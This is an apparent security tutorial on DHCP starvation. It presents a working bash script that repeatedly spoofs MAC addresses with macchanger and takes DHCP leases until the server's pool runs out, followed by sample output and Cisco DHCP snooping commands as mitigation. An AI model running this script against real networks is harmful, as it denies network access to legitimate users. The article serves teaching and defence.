Overview
The DHCP starvation attack is quite simple to implement and therefore quite dangerous. It can be used to implement a denial of service attack in the local network, thus preventing legitimate clients from accessing network resource. In this article we will demonstrate how this attack can be deployed and later we will go through the steps necessary to mitigate it on Cisco equipment.
Scenario
The idea behind DHCP starvation is to make dummy leases for all IPs in the DHCP range. This will effectively cause a DoS, as all new network clients that request an IP address from the DHCP server, will not be served, as there will be no free IP addresses to lease. Depending on the lease time configured on the DHCP server, the effect of the attack will last as long as the time required for the leases to expire.
This attack can be automatically performed with yersinia, but for demonstration purposes we will use a quick and dirty script that only uses macchanger and dhclient.
macchanger is a great tool that just makes what it says in it’s name – it changes the MAC address of your network interface. dhclient on the other hand is the standard tool present in almost any Linux distribution, which is used for leasing an IP address from a DHCP server, and renewing the lease when necessary.
To the point – the following bash script demonstrates step by step the way that such attack works:
root@bt:~# cat starve.sh #!/bin/bash while true; do # kill all running dhcp clients - just in case killall dhclient rm -f /var/run/dhclient.pid # bring down the interface ifconfig eth0 down # change the MAC address of the interface and print the new MAC address macchanger -a eth0 2>&1 | grep Faked # bring the interface up ifconfig eth0 up # make a new DHCP lease dhclient eth0 2>&1 | grep DHCPACK done root@bt:~#
The results from running this script, besides causing a DoS attack (for which you will be personally responsible unless you are authorized to perform penetration testing of the network resources involved), will look much like this:
root@bt:~# ./starve.sh dhclient: no process killed Faked MAC: 00:0e:7b:63:fc:18 (Toshiba) DHCPACK of 192.168.123.207 from 192.168.123.1 Faked MAC: 00:30:63:ec:24:fb (Santera Systems, Inc.) DHCPACK of 192.168.123.208 from 192.168.123.1 Faked MAC: 00:0b:30:df:69:28 (Beijing Gongye Science & Technology Co.,ltd) Faked MAC: 00:0d:08:d3:d9:ad (Abovecable, Inc.) Faked MAC: 00:05:20:49:1f:5a (Smartronix, Inc.)^C root@bt:~#
When you stop seeing DHCPACKs, this means that you have depleted the available leases of the DHCP server.
Mitigation
When IP allocation is done through DHCP servers, DHCP snooping can be configured on the switches to only allow clients with specific IP/MAC addresses to have access to the network.
Use the following commands to configure DHCP snooping:
To enable DHCP Snooping on a Cisco IOS switch, follow these steps:
! To enables DHCP Snooping globally enter:
switch(config)# ip dhcp snooping
! To enable DHCP Snooping for specific VLANs enter:
switch(config)# ip dhcp snooping vlan
! To set the interface to trusted state, which will allow passing DHCP replies enter:
switch(config-if)# ip dhcp snooping trust
! To set a rate limit for DHCP Snooping enter:
switch(config-if)# ip dhcp snooping limit rate